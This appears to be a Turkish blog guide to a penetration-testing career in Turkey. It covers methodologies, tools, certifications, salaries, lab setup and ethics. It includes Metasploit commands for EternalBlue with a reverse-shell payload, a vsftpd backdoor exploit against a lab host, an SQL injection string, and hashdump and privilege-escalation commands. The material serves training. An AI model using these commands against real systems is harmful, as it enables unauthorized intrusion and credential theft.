Penetrasyon Testi Başlangıç Rehberi: Türkiye'de Ethical Hacking Kariyeri
Penetrasyon testi uzmanı olmak isteyenler için kapsamlı Türkçe rehber. Araçlar, metodolojiler ve kariyer önerileri.
Penetrasyon Testi Başlangıç Rehberi#
Penetrasyon testi (pentest), bir sistemin güvenlik açıklarını kontrollü bir şekilde test etme sanatıdır. Bu rehberde, Türkiye'de penetrasyon testi uzmanı olmak isteyenler için gerekli bilgileri ve pratik önerileri bulacaksınız.
Penetrasyon Testi Nedir?#
Penetrasyon testi, bir organizasyonun bilgi sistemlerini, ağlarını ve uygulamalarını gerçek saldırganların kullanabileceği yöntemlerle test etme sürecidir. Amaç:
- Güvenlik açıklarını tespit etmek
- Risk seviyelerini değerlendirmek
- Güvenlik önlemlerinin etkinliğini ölçmek
- Compliance gereksinimlerini karşılamak
Penetrasyon Testi Türleri#
1. Bilgi Düzeyine Göre#
Black Box Testing#
- Hedef sistem hakkında hiçbir bilgi verilmez
- Gerçek saldırgan perspektifini simüle eder
- En uzun süren test türüdür
White Box Testing#
- Sistem hakkında tam bilgi verilir
- Kaynak kod, ağ diyagramları, sistem dokümantasyonu
- En detaylı analiz imkanı sunar
Gray Box Testing#
- Sınırlı bilgi verilir
- Genellikle kullanıcı hesabı ve temel sistem bilgisi
- En yaygın kullanılan yöntemdir
2. Hedef Türüne Göre#
# Penetrasyon testi alanları Ağ Penetrasyon Testi # Network infrastructure Web Uygulama Testi # Web applications Mobil Uygulama Testi # Mobile apps Wireless Ağ Testi # WiFi, Bluetooth Sosyal Mühendislik # Human factor Fiziksel Güvenlik # Physical access
Penetrasyon Testi Metodolojileri#
OWASP Testing Guide#
Web uygulamaları için en kapsamlı rehber:
- Information Gathering: Bilgi toplama
- Configuration Management: Yapılandırma testi
- Authentication: Kimlik doğrulama testi
- Session Management: Oturum yönetimi
- Input Validation: Girdi doğrulama
- Error Handling: Hata yönetimi
- Cryptography: Şifreleme testi
- Business Logic: İş mantığı testi
- Client Side: İstemci tarafı testi
PTES (Penetration Testing Execution Standard)#
# PTES aşamaları 1. Pre-engagement Interactions # Ön hazırlık 2. Intelligence Gathering # Bilgi toplama 3. Threat Modeling # Tehdit modelleme 4. Vulnerability Analysis # Açık analizi 5. Exploitation # Sömürü 6. Post Exploitation # Sömürü sonrası 7. Reporting # Raporlama
NIST SP 800-115#
Amerika Ulusal Standartlar Enstitüsü rehberi:
- Planning: Planlama ve hazırlık
- Discovery: Keşif ve tarama
- Attack: Saldırı ve sömürü
- Reporting: Raporlama ve öneriler
Temel Araçlar ve Teknolojiler#
İşletim Sistemi: Kali Linux#
# Kali Linux kurulumu # 1. ISO dosyasını indirin: https://www.kali.org/downloads/ # 2. Sanal makine oluşturun (VMware/VirtualBox) # 3. Minimum 4GB RAM, 20GB disk alanı # 4. Ağ ayarlarını yapılandırın # Temel güncellemeler sudo apt update && sudo apt upgrade -y sudo apt install -y curl wget git vim
Bilgi Toplama Araçları#
Nmap - Ağ Tarama#
# Temel port tarama nmap -sS -sV -O target_ip # Hızlı tarama nmap -T4 -F target_ip # Kapsamlı tarama nmap -sS -sU -T4 -A -v target_ip # Script tarama nmap --script vuln target_ip
Gobuster - Dizin Tarama#
# Dizin ve dosya tarama gobuster dir -u http://target.com -w /usr/share/wordlists/dirb/common.txt # Alt domain tarama gobuster dns -d target.com -w /usr/share/wordlists/subdomains.txt
Nikto - Web Açık Tarayıcı#
# Web sunucu açık tarama nikto -h http://target.com # SSL tarama nikto -h https://target.com -ssl
Açık Analizi Araçları#
OpenVAS - Açık Tarayıcı#
# OpenVAS kurulumu sudo apt install openvas sudo gvm-setup sudo gvm-start # Web arayüzü: https://localhost:9392
Nessus - Ticari Açık Tarayıcı#
- Ücretsiz Home lisansı mevcut
- 16 IP adresine kadar tarama
- Kapsamlı açık veritabanı
Sömürü Araçları#
Metasploit Framework#
# Metasploit başlatma msfconsole # Exploit arama search type:exploit platform:windows # Exploit kullanımı use exploit/windows/smb/ms17_010_eternalblue set RHOSTS target_ip set PAYLOAD windows/x64/meterpreter/reverse_tcp set LHOST attacker_ip exploit
Burp Suite - Web Uygulama Testi#
# Burp Suite başlatma burpsuite # Proxy ayarları: 127.0.0.1:8080 # Tarayıcı proxy yapılandırması gerekli
Post-Exploitation Araçları#
Meterpreter Komutları#
# Sistem bilgisi sysinfo getuid # Dosya sistemi ls cd /path/to/directory download file.txt upload local_file.txt # Ağ bilgisi ifconfig route arp # Privilege escalation getsystem hashdump
Türkiye'de Penetrasyon Testi Sektörü#
Mevcut Durum#
- Artan Talep: Şirketler düzenli pentest ihtiyacı duyuyor
- Yasal Gereksinimler: KVKK ve sektörel düzenlemeler
- Sigorta Şartları: Siber güvenlik sigortası için pentest zorunluluğu
- Compliance: ISO 27001, PCI DSS gibi standartlar
Maaş Aralıkları (2025)#
# Deneyim seviyesine göre maaş aralıkları Junior Pentester (0-2 yıl): 18.000 - 28.000 TL Mid-level Pentester (2-5 yıl): 25.000 - 40.000 TL Senior Pentester (5+ yıl): 35.000 - 60.000 TL Pentest Team Lead: 45.000 - 80.000 TL Freelance (günlük): 2.000 - 5.000 TL
Başlıca İşverenler#
-
Siber Güvenlik Şirketleri
- STM, HAVELSAN, ASELSAN
- Cyberwise, Netaş, Logo
- Lostar, Biznet, Secom
-
Danışmanlık Firmaları
- PwC, KPMG, Deloitte, EY
- Accenture, IBM, Microsoft
-
Bankalar ve Fintech
- Tüm büyük bankalar
- Fintech startupları
- Ödeme sistemleri şirketleri
Öğrenme Yolu ve Kaynaklar#
1. Temel Bilgiler (1-2 ay)#
# Önkoşul bilgiler - Linux komut satırı - Ağ protokolleri (TCP/IP, HTTP/HTTPS) - Web teknolojileri (HTML, JavaScript, SQL) - Temel programlama (Python, Bash)
2. Pratik Eğitim Platformları#
TryHackMe#
- Türkçe içerik desteği
- Adım adım rehberler
- Başlangıç dostu
- Aylık 10$ (öğrenci indirimi mevcut)
HackTheBox#
- Gerçekçi lab ortamları
- Aktif topluluk
- Ücretsiz makineler mevcut
- VIP üyelik: 20$/ay
VulnHub#
- Ücretsiz vulnerable makineler
- İndirip kendi lab'ınızda çalıştırabilirsiniz
- Çeşitli zorluk seviyeleri
3. Sertifikasyonlar#
Başlangıç Seviyesi#
# eJPT (eLearnSecurity Junior Penetration Tester) Süre: 3 gün Fiyat: ~400$ Zorluk: Başlangıç Tavsiye: İlk sertifika için ideal # PenTest+ (CompTIA) Süre: 165 dakika Fiyat: ~370$ Zorluk: Orta Tavsiye: Teorik bilgi ağırlıklı
İleri Seviye#
# OSCP (Offensive Security Certified Professional) Süre: 24 saat (yeni format) Fiyat: ~1500$ (lab + exam) Zorluk: Yüksek Tavsiye: Sektörde en saygın sertifika # GPEN (GIAC Penetration Tester) Süre: 4 saat Fiyat: ~7000$ Zorluk: Yüksek Tavsiye: SANS eğitimi ile birlikte
Home Lab Kurulumu#
Gerekli Donanım#
# Minimum sistem gereksinimleri RAM: 16GB (32GB önerilen) Depolama: 500GB SSD İşlemci: 4 çekirdek (8 çekirdek önerilen) Ağ: Gigabit ethernet
Sanal Makine Yapılandırması#
# VMware Workstation Pro kurulumu 1. Kali Linux (Attacker) - RAM: 4GB - Disk: 40GB - Network: NAT/Host-only 2. Metasploitable 2 (Vulnerable Linux) - RAM: 1GB - Disk: 8GB - Network: Host-only 3. DVWA (Damn Vulnerable Web App) - Docker container olarak çalıştırılabilir - docker run -d -p 80:80 vulnerables/web-dvwa 4. Windows 10 (Target) - RAM: 4GB - Disk: 40GB - Network: Host-only - Defender kapatılmış
Ağ Yapılandırması#
# pfSense Firewall kurulumu 1. pfSense ISO indir 2. Sanal makine oluştur (2GB RAM, 20GB disk) 3. İki ağ kartı ekle (WAN/LAN) 4. Web arayüzü: https://192.168.1.1 # Ağ segmentasyonu Attacker Network: 192.168.100.0/24 Target Network: 192.168.200.0/24 DMZ Network: 192.168.50.0/24
Pratik Senaryolar#
Senaryo 1: Web Uygulama Testi#
# DVWA üzerinde SQL Injection 1. DVWA'yı başlatın 2. Security Level: Low 3. SQL Injection sayfasına gidin 4. Input: ' OR '1'='1 5. Veritabanı içeriğini görüntüleyin # Burp Suite ile intercepting 1. Proxy'yi aktif edin 2. Tarayıcı trafiğini yakalayın 3. Request'i modify edin 4. Response'u analiz edin
Senaryo 2: Ağ Penetrasyonu#
# Metasploitable 2 sömürüsü 1. Nmap tarama nmap -sS -sV 192.168.200.10 2. Açık tespit - Port 21: vsftpd 2.3.4 (backdoor) - Port 22: SSH - Port 80: Apache 3. Metasploit sömürü use exploit/unix/ftp/vsftpd_234_backdoor set RHOSTS 192.168.200.10 exploit 4. Post-exploitation whoami uname -a find / -perm -4000 2>/dev/null
Raporlama ve Dokümantasyon#
Penetrasyon Testi Raporu Yapısı#
# Penetrasyon Testi Raporu Şablonu ## 1. Executive Summary - Test kapsamı ve hedefleri - Kritik bulgular özeti - Risk değerlendirmesi - Öncelikli öneriler ## 2. Metodoloji - Kullanılan standartlar - Test aşamaları - Araçlar ve teknikler ## 3. Bulgular - Kritik açıklar - Yüksek risk açıklar - Orta risk açıklar - Düşük risk açıklar ## 4. Detaylı Analiz - Her açık için: * Açıklama * Risk skoru * Sömürü adımları * Kanıt (screenshot) * Çözüm önerileri ## 5. Öneriler - Kısa vadeli çözümler - Uzun vadeli iyileştirmeler - Güvenlik politikaları
Rapor Yazım İpuçları#
- Hedef Kitle: Teknik ve yönetici seviyesi için ayrı bölümler
- Görsel Kanıtlar: Screenshot'lar ve diyagramlar
- Risk Skorlama: CVSS v3.1 kullanın
- Çözüm Odaklı: Her problem için çözüm önerin
- Zaman Çizelgesi: Düzeltme için gerçekçi süreler
Yasal ve Etik Konular#
Türkiye'de Yasal Durum#
# Önemli yasal noktalar 1. Yazılı izin zorunluluğu 2. Test kapsamının net tanımlanması 3. Veri gizliliği anlaşmaları 4. Zarar verme yasağı 5. Bulgular gizliliği
Etik Kurallar#
- İzin Almadan Test Yapmayın: Sadece kendi sistemlerinizde veya izin alınan sistemlerde
- Zarar Vermeyin: Sistemleri çökertmeyin, veri silmeyin
- Gizliliği Koruyun: Müşteri bilgilerini paylaşmayın
- Sürekli Öğrenin: Güncel kalın ve bilginizi geliştirin
- Topluma Katkı: Bilginizi etik şekilde kullanın
Kariyer Geliştirme Önerileri#
Networking ve Topluluk#
# Türkiye'deki önemli etkinlikler - OWASP Turkey meetupları - BSides Istanbul - Hack in the Box - DefCamp Turkey - 2600 Turkey buluşmaları
Sürekli Öğrenme#
- Blog Yazın: Öğrendiklerinizi paylaşın
- CTF Yarışmaları: Düzenli katılım
- Bug Bounty: HackerOne, Bugcrowd
- Open Source: Güvenlik araçlarına katkı
- Mentorluk: Yeni başlayanları destekleyin
Uzmanlaşma Alanları#
- Web Application Security: OWASP Top 10
- Mobile Security: iOS/Android app testing
- Cloud Security: AWS/Azure/GCP
- IoT Security: Embedded systems
- Industrial Security: SCADA/ICS systems
Sonuç ve Başlangıç Planı#
Penetrasyon testi, teknik beceri, yaratıcılık ve etik değerlerin birleştiği bir alandır. Türkiye'de bu alanda büyük fırsatlar bulunmaktadır.
30 Günlük Başlangıç Planı#
# Hafta 1: Temel kurulum - Kali Linux kurulumu - Temel araçları öğrenme - TryHackMe'ye kayıt # Hafta 2: Bilgi toplama - Nmap kullanımı - Passive reconnaissance - OSINT teknikleri # Hafta 3: Web uygulama testi - DVWA kurulumu - Burp Suite kullanımı - OWASP Top 10 # Hafta 4: Ağ penetrasyonu - Metasploitable sömürüsü - Metasploit kullanımı - Post-exploitation
Uzun Vadeli Hedefler#
- 3 ay: İlk CTF yarışmasını kazanın
- 6 ay: eJPT sertifikasını alın
- 1 yıl: İlk pentest işinize başlayın
- 2 yıl: OSCP sertifikasını hedefleyin
- 3 yıl: Uzmanlaşma alanınızı belirleyin
Hatırlayın: Penetrasyon testi sadece teknik bir beceri değil, aynı zamanda problem çözme sanatıdır. Sabırlı olun, etik davranın ve sürekli öğrenmeye devam edin.
Bu rehber, penetrasyon testi alanında kariyer yapmak isteyenler için hazırlanmıştır. Güncel bilgiler ve daha fazla kaynak için blog sayfamızı takip edebilirsiniz.